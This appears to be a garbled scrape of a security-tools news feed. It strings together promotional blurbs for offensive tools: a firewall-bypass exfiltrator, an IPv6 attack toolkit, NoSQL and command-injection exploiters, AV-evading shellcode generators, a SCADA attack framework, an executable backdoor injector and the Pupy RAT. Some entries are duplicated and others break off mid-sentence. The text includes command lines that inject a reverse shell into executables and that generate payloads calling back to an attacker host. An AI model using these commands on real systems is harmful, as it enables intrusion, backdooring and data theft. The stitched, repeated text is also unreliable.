Our attack has been tested on several memory units encrypted with BitLocker running on Windows 7, Window 8.1 and Windows 10 (both compatible and non-compatible mode). Here we present two implementations: CUDA and OpenCL.

Requirements:
For CUDA implementation, you need at least CUDA 7.5 and an NVIDIA GPU with minimum cc3.5 (i.e. Kepler arch)

How To
Use the build.sh script to build 3 executables:
+ hash extractor
+ BitCracker CUDA version
+ BitCracker OpenCL version
The executables are stored in the build directory.

Fireaway is a tool for auditing, bypassing, and exfiltrating data against layer 7/AppID inspection rules on next generation firewalls. These tactics are based on the principle of having to allow connections to establish through the NGFW in order to see layer 7 data to filter, as well as spoofing applications to hide communication channels inside the firewall logs as normal user traffic, such as Internet surfing.

Starting the FireAway Server: Typically the FireAway server would be started on the egress side of the firewall (such as a server on the Internet), and listen on a port believed to be closed to see if any application based rules allow traffic out on this port: python fa_server.py <port to listen on>

All data received by the server on this port will be saved to the file ReceivedData.txt in the directory the server was launched from. If the server detects differing sizes in the amount of data received (indicating firewall filtering has kicked in), this output will be shown on the server console:

fa server

Starting the FireAway Client/Application Spoofer: The FireAway client has two modes:
* Test mode (mode 0)-Send random data in incrementing chunk sizes to see how much data can be sent before the firewall AppID engages and stops traffic flow.
* Exfiltration mode (mode 1)-Open a file and send it in chunks through the firewall.

]]>The THC IPV6 ATTACK TOOLKIT v3.3-dev.http://seclist.us/the-thc-ipv6-attack-toolkit-v3-3-dev.html
Mon, 23 Jan 2017 22:09:51 +0000http://seclist.us/?p=13254LEGAL DISCLAMERThe author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.

INTRODUCTION
============
This code was inspired when I got into touch with IPv6, learned more and more about it – and then found no tools to play (read: “hack”) around with. First I tried to implement things with libnet, but then found out that the IPv6 implementation is only partial – and sucks. I tried to add the missing code, but well, it was not so easy, hence I saved my time and quickly wrote my own library.

LIMITATIONS
===========
This code currently only runs on:
– Linux 2.7.x or newer (because of /proc usage)
– Ethernet
But this means for all linux guys that it will work for 98% of your use cases.
Patches are welcome! (add “antispam” in the subject line to get through my
anti-spam protection, otherwise the email will bounce)

THE TOOLS
=========
The THC IPV6 ATTACK TOOLKIT comes already with lots of effective attacking tools:
– parasite6: ICMPv6 neighbor solitication/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite)
– alive6: an effective alive scanng, which will detect all systems listening to this address
– dnsdict6: parallized DNS IPv6 dictionary bruteforcer
– fake_router6: announce yourself as a router on the network, with the highest priority
– redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever ICMPv6 redirect spoofer
– toobig6: mtu decreaser with the same intelligence as redir6
– detect-new-ip6: detect new IPv6 devices which join the network, you can run a script to automatically scan these systems etc.
– dos-new-ip6: detect new IPv6 devices and tell them that their chosen IP collides on the network (DOS).
– trace6: very fast traceroute6 with supports ICMP6 echo request and TCP-SYN
– flood_router6: flood a target with random router advertisements
– flood_advertise6: flood a target with random neighbor advertisements
– fuzz_ip6: fuzzer for IPv6
– implementation6: performs various implementation checks on IPv6
– implementation6d: listen daemon for implementation6 to check behind a FW
– fake_mld6: announce yourself in a multicast group of your choice on the net
– fake_mld26: same but for MLDv2
– fake_mldrouter6: fake MLD router messages
– fake_mipv6: steal a mobile IP to yours if IPSEC is not needed for authentication
– fake_advertiser6: announce yourself on the network
– smurf6: local smurfer
– rsmurf6: remote smurfer, known to work only against linux at the moment
– exploit6: known IPv6 vulnerabilities to test against a target
– denial6: a collection of denial-of-service tests againsts a target
– thcping6: sends a hand crafted ping6 packet
– sendpees6: a tool by willdamn@gmail.com, which generates a neighbor
solicitation requests with a lot of CGAs (crypto stuff to keep the
CPU busy. nice.
and about 25 more tools for you to discover

Just run the tools without options and they will give you help and show the
command line options.DETECTION
=========
Most tools can easily be detected by an IDS or specialized detection software. This is done on purpose to make rogue usage detection easier. The tools either specify a fixed packet signature, or generically sniff for packets (e.g. therefore also answering to ICMPv6 neighbor solitications which
are sent to a non-existing mac, and are therefore very easy to detect).

Installation :

THC-IPV6 requires libpcap development files being installed, also the
libopenssl development files are a good idea.
For Debian/Ubunut/Kali/Backtrack, you can install them by:
$ sudo apt-get install libpcap-dev libssl-dev
To compile simply type
$ make
All tools are installed to /usr/local/bin if you type
$ sudo make install
You need to be root to run most tools

]]>NoSQLMap v0.7 – Automated Mongo database and NoSQL web application exploitation tool.http://seclist.us/nosqlmap-v0-7-automated-mongo-database-and-nosql-web-application-exploitation-tool.html
Sun, 26 Jun 2016 03:25:59 +0000http://seclist.us/?p=11245Changelog v0.7 (Maintenance Release with a couple of cool additions):
+ Web app attacks-Added the ability to specify multiple parameters for injection simultaneously; For example, trying an associative array injection attack on two parameters in the same HTTP request, like the username and password field on a logon page.
+ Bugfix-Workaround to correct issues with self-signed certificates when attacking HTTPS sites and running on Python 2.7.9 or later.
+ Bugfix-Improper formatting on timing based attack URL (trailing &).
+ General-Cleaned up Web app attack code. All moved into a freestanding Python module.

NoSQLMap v0.7

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.
It is named as a tribute to Bernardo Damele and Miroslav’s Stampar’s popular SQL injection tool sqlmap, and its concepts are based on and extensions of Ming Chow’s excellent presentation at Defcon 21, “Abusing NoSQL Databases”. Presently the tool’s exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra are planned in future releases.

NoSQLMap-v0-5

Requirements
On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap’s dependencies.
Varies based on features used:
+ Metasploit Framework
+ MongoDB
+ Python with PyMongo
+ httplib2
+ and urllib available.

[ DISCLAMER ]
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

Codename: Final Polymorphic Stub.You can see what is a different

Komodo Venom v1.0.10

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. This software could be run on Linux/OSX under python 2.7.x.

smod-v1-0-1

Summery
SCADA (Process Control Networks) based systems have moved from proprietary closed networks to open source solutions and TCP/IP enabled networks steadily over recent years. This has made them vulnerable to the same security vulnerabilities that face our traditional computer networks.
The Modbus/TCP protocol was used as the reference protocol to display the effectiveness of the test bed in carrying out cyber attacks on a power system protocol. Modbus/TCP was chosen specifically for these reasons:
+ modbus is still widely used in power systems.
+ modbus/TCP is simple and easy to implement.
+ modbus protocol libraries are freely available for utilities to implement smart grid applications.
You can use this tool to vulnerability assessment a modbus protocol.

]]>venom.sh v1.0.8 stable released – msfvenom shellcode generator/compiler/listenner.http://seclist.us/venom-sh-v1-0-8-stable-released-msfvenom-shellcode-generatorcompilerlistenner.html
Sun, 17 Jan 2016 08:22:11 +0000http://seclist.us/?p=9711[ DISCLAMER ]
The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law.

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

Version 0.2b [2015]:
+ Added: Support for recalling previous commands.
+ Added: Versions for “nongit” users (vx.xx-nongit-yyyymmdd).
+ Added: Support for a tab completion in shell options.
+ Added: Support for alternative (Python) os-shell in dynamic code evaluation (aka eval-based) technique.
+ Added: Support for PHP/Python meterpreter on “reverse_tcp” shell option.
+ Added: The “reverse_tcp” shell option.
+ Added: The ability to check for default root directories (Apache/Nginx).
+ Added: Support for removal of (txt) shell files (File-based/Tempfile-based).
+ Added: Support for JSON POST data.
+ Added: The “enumeration” and “file-read” results to log file.
+ Added: The ability to get the user’s approval before re-{enumerate/file-read} target.
+ Added: The ability to stop current injection technique and proceed on the next one(s).

Commix-0-3b

Commix (short for [com]mand [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.
./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the ‘The Alexa Top 1 Million subdomains’. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto v1.1.6Bluto is attempting to brute force the target domain. this Tools has been tested on Ubuntu, Arch Linux, Debian And Kali 2.0

The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.
./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

]]>Pupy is a remote administration tool with an embeded Python interpreter.http://seclist.us/pupy-is-a-remote-administration-tool-with-an-embeded-python-interpreter.html
Tue, 22 Sep 2015 11:05:24 +0000http://seclist.us/?p=8256Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.Features :
+ On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk
+ Pupy can reflectively migrate into other processes
+ Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
+ modules are quite simple to write and pupy is easily extensible.
+ Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
— we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
+ communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
+ all the non interactive modules can be dispatched on multiple hosts in one command
+ Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
+ modules can be executed as background jobs
+ commands and scripts running on remote hosts are interruptible
+ auto-completion and nice colored output
+ commands aliases can be defined in the config

Pupy is a remote administration tool with an embeded Python interpreter.

Quick start
In these examples the server is running on a linux host (tested on kali linux) and it’s IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload
for Windows:

./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

for MAC OS X:

pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for Linux:

easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443